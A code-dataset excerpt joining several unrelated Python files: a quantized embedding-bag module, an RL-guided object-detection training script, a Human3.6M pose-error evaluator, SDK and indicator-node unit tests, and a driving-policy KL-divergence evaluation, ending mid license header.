features: KeyedJaggedTensor,
) -> KeyedTensor:
pooled_embeddings: List[Tensor] = []
length_per_key: List[int] = []
feature_dict = features.to_dict()
for emb_config, emb_module in zip(
self._embedding_bag_configs, self.embedding_bags
):
for feature_name in emb_config.feature_names:
f = feature_dict[feature_name]
values = f.values()
offsets = f.offsets()
pooled_embeddings.append(
emb_module(
indices=values.int(),
offsets=offsets.int(),
per_sample_weights=f.weights() if self._is_weighted else None,
).float()
)
length_per_key.append(emb_config.embedding_dim)
return KeyedTensor(
keys=self._embedding_names,
values=torch.cat(pooled_embeddings, dim=1),
length_per_key=self._lengths_per_embedding,
)
# pyre-fixme[14]: `state_dict` overrides method defined in `Module` inconsistently.
def state_dict(
self,
destination: Optional[Dict[str, Any]] = None,
prefix: str = "",
keep_vars: bool = False,
) -> Dict[str, Any]:
if destination is None:
destination = OrderedDict()
# pyre-ignore [16]
destination._metadata = OrderedDict()
for emb_config, emb_module in zip(
self._embedding_bag_configs,
self.embedding_bags,
):
(weight, _) = emb_module.split_embedding_weights(split_scale_shifts=False)[
0
]
destination[prefix + f"embedding_bags.{emb_config.name}.weight"] = weight
return destination
def named_buffers(
self, prefix: str = "", recurse: bool = True
) -> Iterator[Tuple[str, nn.Parameter]]:
state_dict = self.state_dict(prefix=prefix, keep_vars=True)
for key, value in state_dict.items():
yield key, value
def _get_name(self) -> str:
return "QuantizedEmbeddingBagCollection"
@classmethod
def from_float(
cls, module: OriginalEmbeddingBagCollection
) -> "EmbeddingBagCollection":
assert hasattr(
module, "qconfig"
), "EmbeddingBagCollection input float module must have qconfig defined"
# pyre-ignore [16]
data_type = dtype_to_data_type(module.qconfig.weight().dtype)
embedding_bag_configs = copy.deepcopy(module.embedding_bag_configs)
for config in embedding_bag_configs:
config.data_type = data_type
table_name_to_quantized_weights: Dict[str, Tuple[Tensor, Tensor]] = {}
device = quantize_state_dict(module, table_name_to_quantized_weights, data_type)
return cls(
table_name_to_quantized_weights,
embedding_bag_configs,
module.is_weighted,
device=device,
)
@property
def embedding_bag_configs(
self,
) -> List[EmbeddingBagConfig]:
return self._embedding_bag_configs
@property
def is_weighted(self) -> bool:
return self._is_weighted
|
py | 1a4b8c9b5179e3a976a417c6a77ba392025b46d9 | # import easydict
from multiprocessing import Process
import yaml
from pathlib import Path
import argparse
import torch
import tqdm
import numpy as np
import copy
# torch
import torchvision
from torchvision.models.detection import FasterRCNN
from torchvision.models.detection.rpn import AnchorGenerator
from torchvision.models import mobilenet_v2
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision import transforms
# from yolov5.train_dt import yolov5
from EfficientObjectDetection.train_new_reward import EfficientOD
# import fr_utils
import munch
import os
import utils
from utils import load_filenames, load_dataset, load_dataloader, compute_map, convert_yolo2coco, label2idx, label_matching, reduce_dict, make_results
opt = {'epochs':100,
'batch_size':12,
'device':1,
'test_epoch':10,
'eval_epoch':2,
'step_batch_size':100,
'save_path':'save',
'save_freq': 5,
'rl_weight':None,
'print_freq': 50,
'h_detector_weight':'',
'l_detector_weight':'',
'fine_tr':'config/fine_tr.yaml',
'fine_eval':'config/fine_eval.yaml',
'coarse_tr':'config/coarse_tr.yaml',
'coarse_eval':'config/coarse_eval.yaml',
'EfficientOD':'config/EfficientOD.yaml',
'split': 4}
opt = munch.AutoMunch(opt)
# GPU Device
gpu_id = opt.device
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)
use_cuda = torch.cuda.is_available()
print("GPU device " , use_cuda)
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
# training option load from yaml files
with open(opt.fine_tr) as f:
fine_tr = yaml.load(f, Loader=yaml.FullLoader)
with open(opt.fine_eval) as f:
fine_eval = yaml.load(f, Loader=yaml.FullLoader)
with open(opt.coarse_tr) as f:
coarse_tr = yaml.load(f, Loader=yaml.FullLoader)
with open(opt.coarse_eval) as f:
coarse_eval = yaml.load(f, Loader=yaml.FullLoader)
with open(opt.EfficientOD) as f:
efficient_config = yaml.load(f, Loader=yaml.FullLoader)
efficient_config['load'] = None # bug fix
epochs = opt.epochs
bs = opt.batch_size
# fine_detector = yolov5(fine_tr, fine_eval, epochs, bs)
# coarse_detector = yolov5(coarse_tr, coarse_eval, epochs, bs)
rl_agent = EfficientOD(efficient_config)
split_train_path = '/home/SSDD/ICIP21_dataset/800_HRSID/split_data_4_0/rl_ver/train/images'
split_val_path = '/home/SSDD/ICIP21_dataset/800_HRSID/split_data_4_0/rl_ver/val/images'
split_test_path = '/home/SSDD/ICIP21_dataset/800_HRSID/split_data_4_0/rl_ver/test/images'
split = 4
original_img_path = '/home/SSDD/ICIP21_dataset/800_HRSID/origin_data/rl_ver/'
original_img_path_train = original_img_path + 'train/images'
original_img_path_val = original_img_path + 'val/images'
original_img_path_test = original_img_path + 'test/images'
assert bs % split == 0, 'batch size must be divisible by the image split patch size'
num_classes = 2
fine_model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=False, num_classes=num_classes, pretrained_backbone=False)
coarse_model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=False, num_classes=num_classes, pretrained_backbone=False)
# # # # replace the classifier with a new one, that has
# # # # num_classes which is user-defined
# # # get number of input features for the classifier
fine_in_features = fine_model.roi_heads.box_predictor.cls_score.in_features
coarse_in_features = coarse_model.roi_heads.box_predictor.cls_score.in_features
# # # replace the pre-trained head with a new one
fine_model.roi_heads.box_predictor = FastRCNNPredictor(fine_in_features, num_classes)
coarse_model.roi_heads.box_predictor = FastRCNNPredictor(coarse_in_features, num_classes)
for fine_p, coarse_p in zip(fine_model.parameters(), coarse_model.parameters()):
fine_p.requires_grad = True
coarse_p.requires_grad = True
fine_model.to(device)
coarse_model.to(device)
# Optimizer
fine_params = [p for p in fine_model.parameters() if p.requires_grad]
coarse_params = [p for p in coarse_model.parameters() if p.requires_grad]
fine_optim = torch.optim.SGD(fine_params, lr=0.005, momentum=0.9, weight_decay=0.0005)
coarse_optim = torch.optim.SGD(coarse_params, lr=0.005, momentum=0.9, weight_decay=0.0005)
fine_lr_scheduler = torch.optim.lr_scheduler.StepLR(fine_optim, step_size=50)
coarse_lr_scheduler = torch.optim.lr_scheduler.StepLR(coarse_optim, step_size=50)
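# Training loop sketch (comment added for clarity): every epoch the fine and
# coarse Faster R-CNN detectors are trained on the split image patches, their
# per-patch detection results are handed to the RL agent as its reward signal,
# and the agent's policy then routes validation/test patches to either detector.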
for e in range(epochs):
    # Create images in the loader even when there are no labels
train_imgs = load_filenames(split_train_path, split, bs).files_array()
fine_train_dataset = load_dataset(train_imgs, fine_tr, bs)
coarse_train_dataset = load_dataset(train_imgs, fine_tr, bs)
fine_train_loader = load_dataloader(bs, fine_train_dataset)
coarse_train_loader = load_dataloader(bs, coarse_train_dataset)
fine_train_nb = len(fine_train_loader)
coarse_train_nb = len(coarse_train_loader)
    assert fine_train_nb == coarse_train_nb, 'fine & coarse train batch numbers do not match'
nb = fine_train_nb
# Logger
fine_metric_logger = utils.MetricLogger(delimiter=" ")
fine_metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))
coarse_metric_logger = utils.MetricLogger(delimiter=" ")
coarse_metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))
fine_header = 'Fine Epoch: [{}]'.format(e)
coarse_header = 'Coarse Epoch: [{}]'.format(e)
# # warmup
fine_lr_scheduler = None
    coarse_lr_scheduler = None
if e == 0:
warmup_factor = 1. / 1000
warmup_iters = min(1000, fine_train_nb-1)
fine_lr_scheduler = utils.warmup_lr_scheduler(fine_optim, warmup_iters, warmup_factor)
coarse_lr_scheduler = utils.warmup_lr_scheduler(coarse_optim, warmup_iters, warmup_factor)
for i, (fine_train, coarse_train) in enumerate(zip(fine_train_loader, coarse_train_loader)):
# train
fine_model.train()
coarse_model.train()
#### fine train ###
# Label mathching
fine_imgs, fine_labels = label_matching(fine_train, device)
fine_imgs = fine_imgs.to(device) / 255.
## train: img normalization --> not, zerodivision err
fine_loss_dict = fine_model(fine_imgs, copy.deepcopy(fine_labels))
fine_losses = sum(loss for loss in fine_loss_dict.values())
fine_loss_dict_reduced = reduce_dict(fine_loss_dict)
fine_loss_reduced = sum(loss for loss in fine_loss_dict_reduced.values())
fine_loss_val = fine_loss_reduced.item()
# optimizer
fine_optim.zero_grad()
fine_losses.backward()
fine_optim.step()
if fine_lr_scheduler is not None:
fine_lr_scheduler.step()
fine_metric_logger.update(loss=fine_loss_reduced, **fine_loss_dict_reduced)
fine_metric_logger.update(lr=fine_optim.param_groups[0]["lr"])
if i % opt.print_freq ==0:
space_fmt = ':' + str(len(str(fine_train_nb))) + 'd'
log_msg = fine_metric_logger.delimiter.join([fine_header, '[{0' + space_fmt + '}/{1}]', '{meters}'])
print(log_msg.format(i, fine_train_nb, meters=str(fine_metric_logger)))
### coarse train ###
# Label mathching
coarse_imgs, coarse_labels = label_matching(coarse_train, device)
coarse_imgs = coarse_imgs.to(device) / 255.
## train: img normalization --> not, zerodivision err
coarse_loss_dict = coarse_model(coarse_imgs, copy.deepcopy(coarse_labels))
coarse_losses = sum(loss for loss in coarse_loss_dict.values())
# utils
coarse_loss_dict_reduced = reduce_dict(coarse_loss_dict)
coarse_loss_reduced = sum(loss for loss in coarse_loss_dict_reduced.values())
coarse_loss_val = coarse_loss_reduced.item()
# optimizer
coarse_optim.zero_grad()
coarse_losses.backward()
coarse_optim.step()
if coarse_lr_scheduler is not None:
coarse_lr_scheduler.step()
coarse_metric_logger.update(loss=coarse_loss_reduced, **coarse_loss_dict_reduced)
coarse_metric_logger.update(lr=fine_optim.param_groups[0]["lr"])
if i % opt.print_freq ==0:
space_fmt = ':' + str(len(str(fine_train_nb))) + 'd'
log_msg = coarse_metric_logger.delimiter.join([coarse_header, '[{0' + space_fmt + '}/{1}]', '{meters}'])
print(log_msg.format(i, fine_train_nb, meters=str(coarse_metric_logger)))
## train eval
# result = (source_path, paths[si], mp, mr, map50, nl, stats)
# file_name, od_file_dir, mp=0(skip), ma=0(skip), map50(will be soon), objnum, stat
# stat = 4
# make_results(model, dataset, device)
fine_results = make_results(fine_model, fine_train, device)
coarse_results = make_results(coarse_model, coarse_train, device)
# conf_thresh=0.001 / iou_thres=0.6
rl_agent.train(e, i, nb, fine_results, coarse_results, original_data_path=original_img_path_train)
## Validation
if e % 1 == 0:
fine_dataset, coarse_dataset, policies = rl_agent.eval(split_val_path, original_img_path_val)
print(len(fine_dataset.tolist()))
print(len(coarse_dataset.tolist()))
fine_results, coarse_results = [], []
if len(fine_dataset.tolist()) > 0:
fine_val_dataset = load_dataset(fine_dataset, fine_tr, bs)
fine_val_loader = load_dataloader(bs, fine_val_dataset)
fine_nb = len(fine_val_loader)
for i, fine_val in tqdm.tqdm(enumerate(fine_val_loader), total=fine_nb):
fine_results += make_results(fine_model, fine_val, device)
if len(coarse_dataset.tolist()) > 0:
coarse_val_dataset = load_dataset(coarse_dataset, fine_tr, bs)
coarse_val_loader = load_dataloader(bs, coarse_val_dataset)
            coarse_nb = len(coarse_val_loader)
for i, coarse_val in tqdm.tqdm(enumerate(coarse_val_loader), total=coarse_nb):
coarse_results += make_results(coarse_model, coarse_val, device)
map50 = compute_map(fine_results, coarse_results)
print('Validation MAP: \n', map50)
# save
if e % opt.save_freq == 0:
        torch.save(fine_model, os.path.join(opt.save_path, 'fine_model'))
        torch.save(coarse_model, os.path.join(opt.save_path, 'coarse_model'))
# Testing
fine_dataset, coarse_dataset, policies = rl_agent.eval(split_test_path, original_img_path_test)
fine_results, coarse_results = [], []
if len(fine_dataset.tolist()) > 0:
fine_test_dataset = load_dataset(fine_dataset, fine_tr, bs)
fine_test_loader = load_dataloader(bs, fine_test_dataset)
fine_nb = len(fine_test_loader)
for i, fine_test in tqdm.tqdm(enumerate(fine_test_loader), total=fine_nb):
fine_results += make_results(fine_model, fine_test, device)
if len(coarse_dataset.tolist()) > 0:
coarse_test_dataset = load_dataset(coarse_dataset, fine_tr, bs)
coarse_test_loader = load_dataloader(bs, coarse_test_dataset)
coarse_nb = len(coarse_test_loader)
for i, coarse_test in tqdm.tqdm(enumerate(coarse_test_loader), total=coarse_nb):
coarse_results += make_results(coarse_model, coarse_test, device)
map50 = compute_map(fine_results, coarse_results)
print('MAP: \n', map50)
with open('test_result.txt', 'a') as f:
f.write(str(map50))
with open('test_policies.txt', 'a') as f:
f.write(str(policies)) |
py | 1a4b8cdcb05e1efd89fcea6bb9dc63c642178f4b | # references:
# https://github.com/una-dinosauria/3d-pose-baseline/blob/master/src/predict_3dpose.py#L305
import numpy as np
from ..utils import data_utils, procrustes
class Human36M_JointErrorEvaluator:
def __init__(self, human36m, predict_14=False, apply_procrustes_alignment=False):
"""
Args:
human36m (Human36MDatasetHandler): Human3.6M dataset.
predict_14 (bool, optional): Whether to predict 14 3d-joints. Defaults to False.
apply_procrustes_alignment (bool, optional): Whether to apply procrustes alignment to the predicted poses.
"""
self.human36m = human36m
self.predict_14 = predict_14
self.apply_procrustes_alignment = apply_procrustes_alignment
self.n_joints = (
14 if self.predict_14 else 17
) # 17 = predicted 16 joints + root (Hip joint)
self.reset()
def reset(self):
"""Remove all samples added so far.
"""
self.joint_distances = []
self.actions = []
def add_samples(self, pred_3d_poses, truth_3d_poses, actions):
"""Add pairs of predicted and ground-truth poses to evaluate.
Args:
pred_3d_poses (numpy.array): Predicted 3d poses (normalized). `[batch_size, n_joints, 3]`.
truth_3d_poses (numpy.array): Ground-truth 3d poses (normalized). `[batch_size, n_joints, 3]`.
actions (list[str]): Actions to which the poses belong.
"""
# Compute distances of corresponding joints of pred/truth poses.
pred = self._preprocess_poses(pred_3d_poses) # [batch_size, n_joints x 3]
truth = self._preprocess_poses(truth_3d_poses) # [batch_size, n_joints x 3]
if self.apply_procrustes_alignment:
pred = self._apply_procrustes_alignment(
sources=pred, targets=truth
) # [batch_size, n_joints x 3]
d = self._compute_joint_distances(pred, truth) # [batch_size, n_joints]
self.joint_distances.append(d)
# Cache action of each frame for per action evaluation.
self.actions.extend(actions)
def get_metrics(self):
"""Get evaluation results.
Returns:
(dict): evaluation results.
"""
joint_distances = np.vstack(self.joint_distances) # [N, n_joints]
actions = np.array(self.actions) # [N,]
assert len(joint_distances) == len(actions)
# Evaluate joint position errors over all actions.
mpjpe = np.mean(joint_distances) # mean per joint position error: float
pjpe = np.mean(joint_distances, axis=0) # per joint position error: [n_joints,]
metrics = {
"MPJPE": mpjpe,
"PJPE": pjpe.tolist(),
}
# Evaluate joint position error per action.
for action in data_utils.H36M_ACTIONS:
mask = actions == action
if np.sum(mask) == 0: # In case no sample is found in the action,
mpjpe = pjpe = -1 # set errors as -1.
print("Warining: no test sample was found in the action: {action}. ")
else:
joint_distances_masked = joint_distances[mask]
mpjpe = np.mean(joint_distances_masked)
pjpe = np.mean(joint_distances_masked, axis=0)
metrics["MPJPE/{}".format(action)] = mpjpe
metrics["PJPE/{}".format(action)] = pjpe.tolist()
return metrics
def _preprocess_poses(self, poses_3d):
mean_3d = self.human36m.mean_3d
std_3d = self.human36m.std_3d
dim_to_ignore_3d = self.human36m.dim_to_ignore_3d
dim_to_use_3d = self.human36m.dim_to_use_3d
# Unnormalize 3d poses.
poses = data_utils.unnormalize_data(
poses_3d, mean_3d, std_3d, dim_to_ignore_3d
) # [batch_size, 32 x 3]
# Keep only the relevant joints.
dim_to_keep = (
dim_to_use_3d
if self.predict_14
else np.hstack([np.arange(3), dim_to_use_3d])
# Add root (Hip joint) if the model predicts 16 joints.
# XXX: Assuming the first 3 values represent root joint 3d position.
)
poses = poses[:, dim_to_keep] # [batch_size, n_joints x 3]
return poses
def _apply_procrustes_alignment(self, sources, targets):
sources_aligned = []
batch_size = len(sources)
for i in range(batch_size):
target = targets[i].reshape(-1, 3) # [n_joints, 3]
source = sources[i].reshape(-1, 3) # [n_joints, 3]
_, _, T, b, c = procrustes.compute_similarity_transform(
target, source, compute_optimal_scale=True
)
aligned = (b * source.dot(T)) + c
aligned = aligned.reshape((-1, self.n_joints * 3)) # [1, n_joints x 3]
sources_aligned.append(aligned)
return np.vstack(sources_aligned) # [batch_size, n_joints x 3]
def _compute_joint_distances(self, pred, truth):
# Compute Euclidean distance error per joint.
d_squared = (pred - truth) ** 2 # [batch_size, n_joints x 3]
d_squared = d_squared.reshape(
(-1, self.n_joints, 3)
) # [batch_size, n_joints, 3]
d_squared = np.sum(d_squared, axis=2) # [batch_size, n_joints]
d = np.sqrt(d_squared) # [batch_size, n_joints]
return d
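# Hedged usage sketch (illustration only; not part of the original module).
# `human36m` stands for an already-loaded Human36MDatasetHandler, and the pose
# arrays for normalized network outputs / ground truth shaped as documented in
# add_samples().
#
# evaluator = Human36M_JointErrorEvaluator(human36m, apply_procrustes_alignment=True)
# evaluator.add_samples(pred_3d_poses, truth_3d_poses, actions)
# print(evaluator.get_metrics()["MPJPE"])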
|
py | 1a4b8f1fd786f0a168bcd44c163e14f3d9b7c346 | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 8
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_2_1
from isi_sdk_8_2_1.models.job_statistics_job_node_memory import JobStatisticsJobNodeMemory # noqa: E501
from isi_sdk_8_2_1.rest import ApiException
class TestJobStatisticsJobNodeMemory(unittest.TestCase):
"""JobStatisticsJobNodeMemory unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testJobStatisticsJobNodeMemory(self):
"""Test JobStatisticsJobNodeMemory"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_2_1.models.job_statistics_job_node_memory.JobStatisticsJobNodeMemory() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | 1a4b8fc24463290d9d9afb562b4b0c37caf486fc | '''
Technical Indicator Node Unit Tests
To run unittests:
# Using standard library unittest
python -m unittest -v
python -m unittest tests/unit/test_indicator_node.py -v
or
python -m unittest discover <test_directory>
python -m unittest discover -s <directory> -p 'test_*.py'
# Using pytest
# "conda install pytest" or "pip install pytest"
pytest -v tests
pytest -v tests/unit/test_indicator_node.py
'''
import warnings
import unittest
import cudf
import gquant.cuindicator as gi
from gquant.plugin_nodes.transform.indicatorNode import IndicatorNode
from gquant.dataframe_flow.task import Task
from .utils import make_orderer
import numpy as np
import copy
ordered, compare = make_orderer()
unittest.defaultTestLoader.sortTestMethodsUsing = compare
class TestIndicatorNode(unittest.TestCase):
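    # setUp builds a 200-row random OHLCV frame whose 'indicator' column marks
    # two composite segments; the tests then check the node's column
    # requirements, NA handling, and that its Chaikin oscillator / Bollinger
    # band outputs match the reference gquant.cuindicator results per segment.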
def setUp(self):
warnings.simplefilter('ignore', category=ImportWarning)
warnings.simplefilter('ignore', category=DeprecationWarning)
# ignore importlib warnings.
size = 200
half = size // 2
self.size = size
self.half = half
np.random.seed(10)
random_array = np.random.rand(size)
open_array = np.random.rand(size)
close_array = np.random.rand(size)
high_array = np.random.rand(size)
low_array = np.random.rand(size)
volume_array = np.random.rand(size)
indicator = np.zeros(size, dtype=np.int32)
indicator[0] = 1
indicator[half] = 1
df = cudf.DataFrame()
df['in'] = random_array
df['open'] = open_array
df['close'] = close_array
df['high'] = high_array
df['low'] = low_array
df['volume'] = volume_array
df['indicator'] = indicator
self._cudf_data = df
self.conf = {
"indicators": [
{"function": "port_chaikin_oscillator",
"columns": ["high", "low", "close", "volume"],
"args": [10, 20]},
{"function": "port_bollinger_bands",
"columns": ["close"],
"args": [10],
"outputs": ["b1", "b2"]}
],
"remove_na": True
}
def tearDown(self):
pass
@ordered
def test_colums(self):
        '''Test node columns requirements'''
node_obj = {"id": "abc",
"type": "IndicatorNode",
"conf": self.conf,
"inputs": {}}
task = Task(node_obj)
inN = IndicatorNode(task)
out_cols = inN.columns_setup()
col = "indicator"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "high"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "low"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "close"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "volume"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "CH_OS_10_20"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in out_cols['stock_out'], msg)
col = "BO_BA_b1_10"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in out_cols['stock_out'], msg)
col = "BO_BA_b2_10"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in out_cols['stock_out'], msg)
@ordered
def test_drop(self):
'''Test node columns drop'''
node_obj = {"id": "abc",
"type": "IndicatorNode",
"conf": self.conf,
"inputs": {}}
task = Task(node_obj)
inN = IndicatorNode(task)
o = inN.process({"stock_in": self._cudf_data})['stock_out']
msg = "bad error: df len %d is not right" % (len(o))
self.assertTrue(len(o) == 162, msg)
newConf = copy.deepcopy(self.conf)
newConf['remove_na'] = False
node_obj = {"id": "abc",
"type": "IndicatorNode",
"conf": newConf,
"inputs": {}}
task = Task(node_obj)
inN = IndicatorNode(task)
o = inN.process({"stock_in": self._cudf_data})['stock_out']
msg = "bad error: df len %d is not right" % (len(o))
self.assertTrue(len(o) == 200, msg)
@ordered
def test_signal(self):
'''Test signal computation'''
newConf = copy.deepcopy(self.conf)
newConf['remove_na'] = False
node_obj = {"id": "abc",
"type": "IndicatorNode",
"conf": newConf,
"inputs": {}}
task = Task(node_obj)
inN = IndicatorNode(task)
o = inN.process({'stock_in': self._cudf_data})['stock_out']
# check chaikin oscillator computation
r_cudf = gi.chaikin_oscillator(self._cudf_data[:self.half]['high'],
self._cudf_data[:self.half]['low'],
self._cudf_data[:self.half]['close'],
self._cudf_data[:self.half]['volume'],
10, 20)
computed = o[:self.half]['CH_OS_10_20'].to_array('pandas')
ref = r_cudf.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
r_cudf = gi.chaikin_oscillator(self._cudf_data[self.half:]['high'],
self._cudf_data[self.half:]['low'],
self._cudf_data[self.half:]['close'],
self._cudf_data[self.half:]['volume'],
10, 20)
computed = o[self.half:]['CH_OS_10_20'].to_array('pandas')
ref = r_cudf.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
# check bollinger bands computation
r_cudf = gi.bollinger_bands(self._cudf_data[:self.half]['close'], 10)
computed = o[:self.half]["BO_BA_b1_10"].to_array('pandas')
ref = r_cudf.b1.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
computed = o[:self.half]["BO_BA_b2_10"].to_array('pandas')
ref = r_cudf.b2.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
r_cudf = gi.bollinger_bands(self._cudf_data[self.half:]['close'], 10)
computed = o[self.half:]["BO_BA_b1_10"].to_array('pandas')
ref = r_cudf.b1.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
computed = o[self.half:]["BO_BA_b2_10"].to_array('pandas')
ref = r_cudf.b2.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
if __name__ == '__main__':
unittest.main()
|
py | 1a4b90103cf91f4b877146f81fec16fce295e637 | import numpy as np
import pickle
from sklearn.neighbors import KernelDensity
import os
import sys
import joblib
import torch
import json
from tqdm import tqdm
sys.path.append("/NAS2020/Workspaces/DRLGroup/zbzhu/lfo-ppuu/lfo")
from dataloader import DataLoader
from map_i80_ctrl import ControlledI80
from tianshou.env import SubprocVectorEnv
from rlkit.torch.sac.policies import MakeDeterministic
from rlkit.data_management.split_dict import split_dict
s_std = np.tile(np.array([392.1703, 44.0625, 24.4669, 1.0952]), 7)
s_mean = np.tile(np.array([887.6, 117.67, 36.453, -0.23616]), 7)
def kl_divergence(x1, x2):
p = kde_prob(x1, min_v=0, max_v=1, scale=100)
q = kde_prob(x2, min_v=0, max_v=1, scale=100)
return np.sum(np.where(p != 0, p * np.log(p / q), 0))
def kde_prob(x, min_v=0, max_v=1, scale=100):
kde = KernelDensity(kernel="gaussian", bandwidth=(max_v - min_v) * 1.0 / scale).fit(
list(x)
) # x.shape: [None, 2]
data = [
(i * 1.0 / scale, j * 1.0 / scale)
for i in range(min_v * scale, max_v * scale)
for j in range(min_v * scale, max_v * scale)
]
prob = np.exp(kde.score_samples(data)) + 1e-4 # x.shape: [None, 1]
return prob
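# Note (comment added for clarity): kl_divergence() above estimates KL(p || q)
# between two sets of normalized 2-D positions by fitting a Gaussian KDE to each
# set and comparing the densities on a scale x scale grid covering [0, 1) x [0, 1).
# Minimal sketch, assuming both inputs are already scaled into the unit square:
#
# xy_a = np.random.rand(1000, 2)
# xy_b = np.random.rand(1000, 2)
# print(kl_divergence(xy_a, xy_b))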
def obs_unnorm(obs):
obs *= s_std
obs += s_mean
return obs
def make_env(env_kwargs, rank, seed=0, car_index=None):
def _init():
"""
env_specs:
env_name: 'halfcheetah'
env_kwargs: {} # kwargs to pass to the env constructor call
"""
env = ControlledI80(**env_kwargs)
env.seed(rank + seed)
if car_index is not None and hasattr(env, "set_train_indx"):
env.set_train_indx(car_index)
return env
return _init
class opt:
debug = 0
demo_path = "/NAS2020/Workspaces/DRLGroup/zbzhu/lfo-ppuu/expert_demo_xy.pkl"
test_idx_path = "/NAS2020/Workspaces/DRLGroup/zbzhu/lfo-ppuu/lfo/demos/expert_trajs_50/PPUU/test_indx_final.pkl"
log_path = "/NAS2020/Workspaces/DRLGroup/zbzhu/lfo-ppuu/lfo/logs/gailfo-ppuu-final/gailfo_ppuu_final--2021_01_26_03_20_45--s-0"
model_path = os.path.join(log_path, "best.pkl")
variant_path = os.path.join(log_path, "variant.json")
with open(variant_path, "rb") as f:
variant = json.load(f)
env_kwargs = dict(
fps=30,
nb_states=1,
display=False,
delta_t=0.1,
store=False,
show_frame_count=False,
data_dir="ppuu_logs/",
)
if __name__ == "__main__":
env_num = 50
env_wait_num = 25
with open(test_idx_path, "rb") as f:
test_idx = pickle.load(f)
splited_eval_dict = split_dict(test_idx, env_num)
eval_car_num = [len(d) for d in splited_eval_dict]
envs = SubprocVectorEnv(
[
make_env(
env_kwargs,
i,
car_index=splited_eval_dict[i],
)
for i in range(env_num)
],
wait_num=env_wait_num,
)
if os.path.isfile(demo_path):
with open(demo_path, "rb") as f:
all_demo_x, all_demo_y = pickle.load(f)
else:
dataloader = DataLoader(None, opt, "i80")
all_demo_x, all_demo_y = [], []
for idx in test_idx.keys():
all_demo_x.extend(dataloader.states[idx][:, 0, 0].numpy())
all_demo_y.extend(dataloader.states[idx][:, 0, 1].numpy())
with open(demo_path, "wb") as f:
pickle.dump((all_demo_x, all_demo_y), f)
model = joblib.load(model_path)
policy = model["policy"]
eval_policy = MakeDeterministic(policy)
all_agent_x, all_agent_y = [], []
items = list(test_idx.items())
ready_env_ids = np.arange(env_num)
finished_env_ids = []
obs_list = envs.reset()
done = False
episode_step = np.zeros(env_num)
env_finished_car_num = np.zeros(env_num)
pbar = tqdm(total=len(items))
while True:
actions = []
for obs in obs_list[ready_env_ids]:
ori_obs = obs_unnorm(obs.copy())
agent_x = ori_obs[0]
agent_y = ori_obs[1]
all_agent_x.append(agent_x)
all_agent_y.append(agent_y)
with torch.no_grad():
action, _ = eval_policy.get_action(obs_np=obs)
actions.append(action)
actions = np.array(actions)
next_obs_list, rews, dones, env_infos = envs.step(actions, id=ready_env_ids)
ready_env_ids = np.array([i["env_id"] for i in env_infos])
obs_list[ready_env_ids] = next_obs_list
for idx, done in enumerate(dones):
env_id = ready_env_ids[idx]
episode_step[env_id] += 1
if done or episode_step[env_id] > 1500:
env_finished_car_num[env_id] += 1
pbar.update(1)
if not done:
obs_list[env_id] = envs.reset(id=env_id)
if env_finished_car_num[env_id] == eval_car_num[env_id]:
finished_env_ids.append(env_id)
ready_env_ids = np.array(
[x for x in ready_env_ids if x not in finished_env_ids]
)
if len(finished_env_ids) == env_num:
assert len(ready_env_ids) == 0
break
pbar.close()
all_agent_x = np.array(all_agent_x)[:, np.newaxis] / 1600
all_agent_y = np.array(all_agent_y)[:, np.newaxis] / 200
all_agent_pos = np.concatenate((all_agent_x, all_agent_y), 1)
all_demo_x = np.array(all_demo_x)[:, np.newaxis] / 1600
all_demo_y = np.array(all_demo_y)[:, np.newaxis] / 200
all_demo_pos = np.concatenate((all_demo_x, all_demo_y), 1)
kld = kl_divergence(all_agent_pos, all_demo_pos)
print(kld)
|
py | 1a4b90bcaa04099413775127fbdb065ea1e2bdcf | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
